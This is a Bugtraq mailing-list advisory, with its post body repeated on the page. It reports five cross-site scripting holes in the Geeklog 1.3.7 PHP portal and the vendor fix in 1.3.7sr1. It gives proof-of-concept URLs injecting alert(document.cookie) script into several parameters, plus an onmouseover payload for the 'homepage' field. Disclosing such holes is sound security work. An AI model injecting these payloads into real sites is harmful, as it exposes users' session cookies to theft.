Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
Multiple XSS in Geeklog 1.3.7
Jan 14 2003 02:43AM
snooq (jinyean hotmail com)
nothing new. typical XSS bugs.
summary
=======
Geeklog is a web portal system written in PHP.
There exists 5 XSS holes in the software.
the 'holes'
===========
--1--
http://vulnerable.host/profiles.php?uid=<script>alert(document.coo
kie)</script>
--2--
http://vulnerable.host/users.php?mode=profile&uid=<script>alert(do
cument.cookie)</script>
--3--
http://vulnerable.host//comment.php?mode=Delete&sid=1&cid=<script>
alert(document.cookie)</script>
--4--
http://vulnerable.host//profiles.php?what=contact&author=ich&authoremail
=bla%40bla.com&subject=hello&message=text&uid=<script>alert(docume
nt.cookie)</script>
--5--
'homepage' field in the user's account information page
is not sanitised properly. As a result, javascript can
be injected by setting the 'homepage' field like this:
http://url" onmouseover="alert(document.cookie)
** 3) & 4) were found by Dirk Haun of Geeklog Team.
vendor status
=============
03/01/2003
contacted Dirk Haun of Geeklog team
14/01/2003
Geeklog 1.3.7sr1 was released.
New version closes all holes found.
--==snooq==--
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
nothing new. typical XSS bugs.
summary
=======
Geeklog is a web portal system written in PHP.
There exists 5 XSS holes in the software.
the 'holes'
===========
--1--
http://vulnerable.host/profiles.php?uid=<script>alert(document.coo
kie)</script>
--2--
http://vulnerable.host/users.php?mode=profile&uid=<script>alert(do
cument.cookie)</script>
--3--
http://vulnerable.host//comment.php?mode=Delete&sid=1&cid=<script>
alert(document.cookie)</script>
--4--
http://vulnerable.host//profiles.php?what=contact&author=ich&authoremail
=bla%40bla.com&subject=hello&message=text&uid=<script>alert(docume
nt.cookie)</script>
--5--
'homepage' field in the user's account information page
is not sanitised properly. As a result, javascript can
be injected by setting the 'homepage' field like this:
http://url" onmouseover="alert(document.cookie)
** 3) & 4) were found by Dirk Haun of Geeklog Team.
vendor status
=============
03/01/2003
contacted Dirk Haun of Geeklog team
14/01/2003
Geeklog 1.3.7sr1 was released.
New version closes all holes found.
--==snooq==--
[ reply ]